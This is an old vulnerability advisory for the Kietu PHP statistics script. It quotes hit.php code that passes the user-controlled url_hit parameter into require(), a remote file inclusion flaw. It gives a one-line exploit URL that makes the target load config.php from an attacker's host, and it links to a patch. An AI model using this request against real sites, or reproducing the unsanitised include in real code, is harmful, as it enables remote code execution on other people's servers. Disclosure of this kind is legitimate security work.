Informations :
°°°°°°°°°°°°°°
Website : http://kietu.free.fr
Version : 2.0, 2.3
Problem : Include file
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
hit.php :
------------------------------------------------------------------
if (!get_cfg_var("register_globals")) {
$kietu["remote_addr"] = $HTTP_SERVER_VARS["REMOTE_ADDR"];
$kietu["http_user_agent"] = $HTTP_SERVER_VARS["HTTP_USER_AGENT"];
$kietu["website"] = $HTTP_GET_VARS["website"];
$kietu["appel"] = $HTTP_GET_VARS["appel"];
$kietu["http_referer"] = $HTTP_SERVER_VARS["HTTP_REFERER"];
$kietu["php_self"] = $HTTP_SERVER_VARS["PHP_SELF"];
$kietu["url_hit"] = $HTTP_GET_VARS["url_hit"].$url_hit;
}
else {
$kietu["remote_addr"] = $REMOTE_ADDR;
$kietu["http_user_agent"] = $HTTP_USER_AGENT;
$kietu["website"] = $website;
$kietu["appel"] = $appel;
$kietu["http_referer"] = $HTTP_REFERER;
$kietu["php_self"] = $PHP_SELF;
$kietu["url_hit"] = $url_hit;
}
require ($kietu["url_hit"]."config.php");
------------------------------------------------------------------
Exploit :
°°°°°°°°°
http://[target]/hit.php?url_hit=http://[attacker]/
with :
http://[attacker]/config.php
Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.org
More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/5holes8.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes8.txt&langpair=fr%7Cen&hl=fr&ie=ISO-8859-1&prev=%2Flanguage_tools
This hole was published in "the Hackademy Journal 01", october 2002 (http://www.dmpfrance.com).
frog-m@n
_________________________________________________________________
MSN Search, le moteur de recherche qui pense comme vous ! http://search.fr.msn.be